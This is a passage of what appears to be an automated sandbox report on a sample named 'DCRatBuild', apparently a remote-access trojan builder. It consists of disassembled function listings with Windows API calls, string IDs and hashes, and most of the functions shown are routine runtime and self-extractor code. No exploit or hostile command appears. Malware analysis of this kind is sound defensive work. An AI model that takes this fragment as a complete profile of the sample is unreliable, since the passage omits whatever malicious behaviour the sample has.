                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                      • String ID: rtmp%d
                      • API String ID: 2111052971-3303766350
                      • Opcode ID: f34aab2d915b1eabfe590eee463f085bb9a0e43db0955372fd835c388de8e0ba
                      • Instruction ID: b95f8ef078a0d0eb75ac830d36de25307219049d4bc8303f19dc7405de3a5c3c
                      • Opcode Fuzzy Hash: f34aab2d915b1eabfe590eee463f085bb9a0e43db0955372fd835c388de8e0ba
                      • Instruction Fuzzy Hash: 23413A71900258A7CF20EBA4CD95AEEB77CEF15380F0444E6B549E3142EB749B89CA74
                      Function 00D78E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00D78F38
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00D78F59
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00D78F80
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                      • API String ID: 4094277203-4209811716
                      • Opcode ID: b5c5814ccaff3d4bc4f3cc55a85f37eb959e4db45329a2a8b1efd2efccca0a67
                      • Instruction ID: 56ea898eb27f1b405496711ec7649006458937e3ca5d322ebae33b4be2c36a88
                      • Opcode Fuzzy Hash: b5c5814ccaff3d4bc4f3cc55a85f37eb959e4db45329a2a8b1efd2efccca0a67
                      • Instruction Fuzzy Hash: 3C312A315483117FDB24BB649C4AF6FB768EF41720F14811AF809A61D2FF649A0993B1
                      Function 00D70A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                      Download Yara Rule
                      APIs
                      • __aulldiv.LIBCMT ref: 00D70A9D
                        • Part of subcall function 00D6ACF5: GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D70AC0
                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D70AD2
                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D70AE3
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70AF3
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70B03
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D70B3D
                      • __aullrem.LIBCMT ref: 00D70BCB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                      • String ID:
                      • API String ID: 1247370737-0
                      • Opcode ID: e542c2159fb6719d17ba4cf4adf29d78fc1477b8305a64b12469db995ddd6e0b
                      • Instruction ID: 808e661694c1ff96392cbce8496cd9c98403f782882dafc32671e27e3ae14dc8
                      • Opcode Fuzzy Hash: e542c2159fb6719d17ba4cf4adf29d78fc1477b8305a64b12469db995ddd6e0b
                      • Instruction Fuzzy Hash: 8B4119B5408306DFC710DF65C88496BFBF8FB88714F048A2EF59692650E735E649CB61
                      Function 00D8EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00D8F5A2,?,00000000,?,00000000,00000000), ref: 00D8EE6F
                      • __fassign.LIBCMT ref: 00D8EEEA
                      • __fassign.LIBCMT ref: 00D8EF05
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00D8EF2B
                      • WriteFile.KERNEL32(?,?,00000000,00D8F5A2,00000000,?,?,?,?,?,?,?,?,?,00D8F5A2,?), ref: 00D8EF4A
                      • WriteFile.KERNEL32(?,?,00000001,00D8F5A2,00000000,?,?,?,?,?,?,?,?,?,00D8F5A2,?), ref: 00D8EF83
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                      • String ID:
                      • API String ID: 1324828854-0
                      • Opcode ID: 5f572e52770e7976444d9ca203d164716765fa16ded71458868ea9ce7a3a015a
                      • Instruction ID: 532965abf55d4ccf61c6b592921fbc5b4a68323437825c77fa6ac3401b6e99e1
                      • Opcode Fuzzy Hash: 5f572e52770e7976444d9ca203d164716765fa16ded71458868ea9ce7a3a015a
                      • Instruction Fuzzy Hash: 0451B375A00209AFDB10DFA8D885AEEFBF9EF09310F18451AE555E7291E7309941CF70
                      Function 00D7C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathW.KERNEL32(00000800,?), ref: 00D7C54A
                      • _swprintf.LIBCMT ref: 00D7C57E
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • SetDlgItemTextW.USER32(?,00000066,00DA946A), ref: 00D7C59E
                      • _wcschr.LIBVCRUNTIME ref: 00D7C5D1
                      • EndDialog.USER32(?,00000001), ref: 00D7C6B2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                      • String ID: %s%s%u
                      • API String ID: 2892007947-1360425832
                      • Opcode ID: 65a6795e3ec7705d3aea1f37709e98ce772275fa0cd9bfff84f735f0b5858fff
                      • Instruction ID: 2a9e2a8345c726b48062816c6f9c237d225f27a078b9f68fdae7d6d60a6ed344
                      • Opcode Fuzzy Hash: 65a6795e3ec7705d3aea1f37709e98ce772275fa0cd9bfff84f735f0b5858fff
                      • Instruction Fuzzy Hash: B941C271910618AEDB22DBA0DC85EEA77BCEB09701F0490A6E50DE6160F7719BC4CB70
                      Function 00D79635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                      Download Yara Rule
                      APIs
                      • ShowWindow.USER32(?,00000000), ref: 00D7964E
                      • GetWindowRect.USER32(?,00000000), ref: 00D79693
                      • ShowWindow.USER32(?,00000005,00000000), ref: 00D7972A
                      • SetWindowTextW.USER32(?,00000000), ref: 00D79732
                      • ShowWindow.USER32(00000000,00000005), ref: 00D79748
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Window$Show$RectText
                      • String ID: RarHtmlClassName
                      • API String ID: 3937224194-1658105358
                      • Opcode ID: 45f31c91ce21e714a627fb1594b4737829f2916979b3c8280211bea22ee4c6f2
                      • Instruction ID: a22c8c926259e01866697c93bd7260e6c0bbf12f88f2ea76c1df1de6e3cef535
                      • Opcode Fuzzy Hash: 45f31c91ce21e714a627fb1594b4737829f2916979b3c8280211bea22ee4c6f2
                      • Instruction Fuzzy Hash: EF31AD32004301AFCB25AF64DC49F6BBBA8EF48711F088559FA4D9A262EB34D905CB71
                      Function 00D8BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D8BF79: _free.LIBCMT ref: 00D8BFA2
                      • _free.LIBCMT ref: 00D8C003
                        • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958), ref: 00D884F4
                        • Part of subcall function 00D884DE: GetLastError.KERNEL32(00D93958,?,00D8BFA7,00D93958,00000000,00D93958,00000000,?,00D8BFCE,00D93958,00000007,00D93958,?,00D8C3CB,00D93958,00D93958), ref: 00D88506
                      • _free.LIBCMT ref: 00D8C00E
                      • _free.LIBCMT ref: 00D8C019
                      • _free.LIBCMT ref: 00D8C06D
                      • _free.LIBCMT ref: 00D8C078
                      • _free.LIBCMT ref: 00D8C083
                      • _free.LIBCMT ref: 00D8C08E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                      • Instruction ID: 24080eac5913b0e24b21dc5bc522bfb7bd2588c7ee959b8a1b675921eaf11cb1
                      • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                      • Instruction Fuzzy Hash: 741112B2540B44F6D620BBB0CC07FCBB79DEF04710F408856B39966452DB66F9049BB4
                      Function 00D820CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,00D820C1,00D7FB12), ref: 00D820D8
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D820E6
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D820FF
                      • SetLastError.KERNEL32(00000000,?,00D820C1,00D7FB12), ref: 00D82151
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: 669e2bd1121dbe5c246c032c2e66d0a1e3fb9cbc69622781925098cfd45e57d6
                      • Instruction ID: be0a174f10fdc03735955a43db90d355221366936be38b2efe15accb6c6eb36e
                      • Opcode Fuzzy Hash: 669e2bd1121dbe5c246c032c2e66d0a1e3fb9cbc69622781925098cfd45e57d6
                      • Instruction Fuzzy Hash: F001AC32109711AEF7543BB5BC8993B2B45EB21B747350A2BF218952E1EF614D019374
                      Function 00D7DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID:
                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                      • API String ID: 0-1718035505
                      • Opcode ID: f0be2fc0ff69939f3fc08808ec0ffb5b7cbea050289720b985426161878f34a8
                      • Instruction ID: 5da77717c8d5d1ff1e579263b1765e620a4cb424fe204054418e2bfe5df3041a
                      • Opcode Fuzzy Hash: f0be2fc0ff69939f3fc08808ec0ffb5b7cbea050289720b985426161878f34a8
                      • Instruction Fuzzy Hash: B001F4316413239B4F725E756D816A637B6AE85312328817BE64DD3300FAB2C885D7F0
                      Function 00D70CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                      Download Yara Rule
                      APIs
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70D0D
                        • Part of subcall function 00D6ACF5: GetVersionExW.KERNEL32(?), ref: 00D6AD1A
                      • LocalFileTimeToFileTime.KERNEL32(?,00D70CB8), ref: 00D70D31
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D70D47
                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D70D56
                      • SystemTimeToFileTime.KERNEL32(?,00D70CB8), ref: 00D70D64
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D70D72
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Time$File$System$Local$SpecificVersion
                      • String ID:
                      • API String ID: 2092733347-0
                      • Opcode ID: cda96ba12f147dd5d4dd3a4918f39060b45d7ee8041a77b11ea997620346a195
                      • Instruction ID: 14fce58203a712297c9f764f5d0c60112c7402f9039dcd74c5e5499f89270c92
                      • Opcode Fuzzy Hash: cda96ba12f147dd5d4dd3a4918f39060b45d7ee8041a77b11ea997620346a195
                      • Instruction Fuzzy Hash: 6631C67A90020AEBCB10DFE5D8859EFBBBCFF58700B04455AE959E3610E730AA45CB75
                      Function 00D791B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: ac245c3e15898c35e9b4fdd3e0b19754c739d500de77432ccade97dba745bcd0
                      • Instruction ID: 01c5d12b83af5666628fb9dd2b3930ee1a64bd07c3893d033399f1255c7dd171
                      • Opcode Fuzzy Hash: ac245c3e15898c35e9b4fdd3e0b19754c739d500de77432ccade97dba745bcd0
                      • Instruction Fuzzy Hash: CD21817260020EBBDB15AB20DC91E2BB7ADEB51784B54C129FC4D9A206F270ED4587B4
                      Function 00D88FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,00DA0EE8,00D83E14,00DA0EE8,?,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D88FA9
                      • _free.LIBCMT ref: 00D88FDC
                      • _free.LIBCMT ref: 00D89004
                      • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D89011
                      • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D8901D
                      • _abort.LIBCMT ref: 00D89023
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: fa70e3b3e726ab371fc6551cdf5896ef4ff1ac654de1e504cc53d36f70f0f080
                      • Instruction ID: a4ef3c61c22eb30f795148dbe837b7956e18becf4bc8d274b8238a5d65c7a325
                      • Opcode Fuzzy Hash: fa70e3b3e726ab371fc6551cdf5896ef4ff1ac654de1e504cc53d36f70f0f080
                      • Instruction Fuzzy Hash: E1F02236504B116AC22277286C0AF3B2B2ADFC1761F6C011AF659E2296EF20CD02B335
                      Function 00D7D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D7D2F2
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7D30C
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7D31D
                      • TranslateMessage.USER32(?), ref: 00D7D327
                      • DispatchMessageW.USER32(?), ref: 00D7D331
                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D7D33C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                      • String ID:
                      • API String ID: 2148572870-0
                      • Opcode ID: 752ce509fdae00c3ccb6aa702859ff916c8821f37127ed0f48fc874e2bf77393
                      • Instruction ID: d20bb52081f12802cf3340757c17bb8117396e9db3cc24f9df5413a8b8f5485a
                      • Opcode Fuzzy Hash: 752ce509fdae00c3ccb6aa702859ff916c8821f37127ed0f48fc874e2bf77393
                      • Instruction Fuzzy Hash: 38F0EC72A0121AABCB205BA5DC4CEEBBF7EEF527A1F048012F64AD2150E6359541D7F1
                      Function 00D7C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                      Download Yara Rule
                      APIs
                      • _wcschr.LIBVCRUNTIME ref: 00D7C435
                        • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: CompareString_wcschr
                      • String ID: <$HIDE$MAX$MIN
                      • API String ID: 2548945186-3358265660
                      • Opcode ID: 296d305e4db53870c4e630c75d4cade76b5bdbeb3ea9d31f936065aefabe3fbe
                      • Instruction ID: cddcdfff26dbbffab27b6530e3cd9a0af4e9afce998b8a65d85611a3797203f0
                      • Opcode Fuzzy Hash: 296d305e4db53870c4e630c75d4cade76b5bdbeb3ea9d31f936065aefabe3fbe
                      • Instruction Fuzzy Hash: 69318076910609AEDF25DA54DC51EEE77BCEB54304F0080AAFA0DD6190FBB19AC48B70
                      Function 00D7ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadBitmapW.USER32(00000065), ref: 00D7ADFD
                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7AE22
                      • DeleteObject.GDI32(00000000), ref: 00D7AE54
                      • DeleteObject.GDI32(00000000), ref: 00D7AE77
                        • Part of subcall function 00D79E1C: FindResourceW.KERNEL32(00D7AE4D,PNG,?,?,?,00D7AE4D,00000066), ref: 00D79E2E
                        • Part of subcall function 00D79E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E46
                        • Part of subcall function 00D79E1C: LoadResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E59
                        • Part of subcall function 00D79E1C: LockResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E64
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                      • String ID: ]
                      • API String ID: 142272564-3352871620
                      • Opcode ID: 35e6dc4fc9eb043d3c2b51b8d19b4ad318d5145e06010545b9193a033bb53c7e
                      • Instruction ID: 3f7aa01555fdc72ffdc2dc26a5d70ed91bc273553177edade2e71a2bcbe17aa6
